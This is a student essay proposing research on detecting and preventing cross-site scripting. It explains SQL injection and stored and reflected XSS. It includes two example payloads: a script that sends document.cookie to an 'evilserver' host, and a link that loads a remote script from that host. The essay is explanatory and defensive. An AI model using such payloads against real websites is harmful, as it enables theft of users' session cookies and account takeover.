Xss Web Vulnerability Identification Protection Computer Science Essay

Published: Last Edited:

This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

As social networking sites proliferate across the World Wide Web, complex user-created HTML content is rapidly becoming the norm rather than the exception. User-created web content is a notorious vector for cross-site scripting (XSS) attacks that target websites and confidential user data. In this threat climate, mechanisms that render web applications immune to XSS attacks have been of recent research interest. Cross site scripting (XSS) is a common security problem of web applications where an attacker can inject scripting code into the output of the application that is then sent to a user's web browser. In the web browser, this scripting code is executed and used to transfer sensitive data to a third party. Today's solutions attempt to prevent XSS on the server side, for example, by inspecting and modifying the data sent to and from the web application. For social networking sites the criticality of XSS attacks gets even higher because the hackers can try more socially engineered attacks where the target user can be fooled by thinking that an attack link is coming from his 'friend'. This research work will focus on defense mechanisms for cross-site scripting attacks. We will discuss several recent real-world XSS attacks and analyze the reasons for the failure of filtering mechanisms in defending these attacks. This thesis would describe/implement ways of identifying XSS vulnerabilities in Web2.0 based websites. Suggesting ways to prevent such loopholes would also be part of this thesis.



Web today has evolved and is still growing at a rapid pace. Complex business applications are now being delivered over the web. More and more people are using web every day. Many social networking sites have emerged as a result of this rapid growth. As more and more data, both secure and un-secure is available on the net it raises a serious concern about the security of cloud computing, social networking and other websites in general. Cyber criminals have become highly effective in stealing data and getting away with it, which makes organizations and businesses around the world more and more vulnerable to cyber crime attacks. Attackers have found new attacks to exploit vulnerabilities in web applications. Among these attacks cross-site scripting has received much attention in the recent scientific literature Cross-site scripting (XSS) attacks are the number-one security threat on the Internet today. These attacks breach con¬dentiality of sensitive data, undermine authorization schemes, defraud users, defame web sites, and more. Notably Facebook, LiveJournal, MySpace and Orkut have all been hit by these attacks.

Many web sites use open source web applications to provide certain services that are part of the web site. Web applications are not only used by private web site providers but also by companies and governmental institutions. If web applications are used to assemble web pages, the information contained in them can be gathered from various sources. One of the most important sources is data from the interaction of the user with the web page. The user clicks on links to decide which page is to be displayed next, requests information, leaves messages by ¬lling out forms, or searches for something on the web site. Most often a database is used as the primary resource to retrieve information that is requested by the user.

To extract personal information from the web application, "SQL injection" can be used. In this kind of attack, information that is entered by the user is included in database queries that are used to extract content for the web page. Because the user input is not checked for malicious content, arbitrary SQL queries can be executed. These queries can then be used to circumvent safety procedures incorporated in the web application (e.g., bypass logins), retrieve personal data of customers (e.g., credit card numbers, social security numbers) or execute system commands on the targeted web server (e.g., to install malicious software on the server).

To use the web application as a platform to attack users, a special kind of attack called "Cross Site Scripting" (XSS) can be performed. Similar to the SQL injection scenario, malicious code is included in the information entered on the web site. The web application processes this information without checking it for HTML or scripting code and inserts it into the output of the web page that is delivered to the attacked user. The web browser (e.g., Mozilla Firefox) then displays the content of the web page and executes the malicious code in the context of the web site. The malicious program can therefore access sensitive data stored in the user's web browser (e.g., a cookie that can be accessed with document and transfer it without notice to a third party (i.e., a web site that is under control of the attacker). The attacker can thus collect information gathered by the script.

Fig.1 Interactions during a cross-site scripting attack

There are two methods for injecting code into the web page that is displayed to the user:

Stored XSS

Re¬‚ected XSS

Stored XSS Attack:

With a "Stored XSS" attack, the attacker stores malicious code in the web application. Later, the victim requests the page that contains this scripting code. A web based bulletin board system (e.g., phpBB [52]) where people can enter messages that are displayed to anyone interested in reading them can be used to implement this kind of attack. The attacker crafts a message such as the one in Figure 1.1, which contains the malicious JavaScript code and the bulletin board system stores it in its database. A victim reading the message downloads the scripting code of the attacker as part of the message. This code is executed in the web browser of the victim and transfers the cookie of the user to a web server that is controlled by the attacker.

Look at this picture!

<img src="image">


document.images[0].src = "http://evilserver/image.jpg"+"?stolencookie=" + document.cookie;


Example of a message for the "Stored XSS" attack that transfers the cookie

(e.g., credit card numbers of customers) or they use the web application as an attack vector on the visiting customer.

Reflected XSS Attack:

A "Re¬‚ected XSS" attack sends the malicious code back to the user with the help of the web application. To do this, the attacker sends a link to the victim (e.g., by email), similar to the one

<a href="http://goodserver/comment.cgi?mycomment=<script

src='http://evilserver/xss.js'></script>">Click here</a>

Above Example for a "Re¬‚ected XSS" attack with shows HTML code that contains a script to attack the receiver of the email. If the victim clicks on the link, the vulnerable web application displays the requested web page with the information passed to it in this link. This information contains the malicious code which is now part of the web page that is sent back to the web browser of the user, where it is executed.

Typically, advisories to prevent cross site scripting require that the web application providers ensure that their deployed software is not vulnerable. This can either be done during the web application development process by employing software design and implementation methods that produce more secure code, or when the application is already deployed on the web server. In case the web site owner uses third party products, the latest vendor patches have to be applied on a regular basis, or whenever they are published, to protect the web site's users. Unfortunately, it takes time to develop and test a patch for a newly found vulnerability. While working on the patch, the web site visitors are exposed to the threat. Most of the time, it is not apparent to the visitors whether or not the latest patches have been applied to the web application. Therefore, surfers on the Internet are constantly endangered to be the victim of a cross site scripting attack.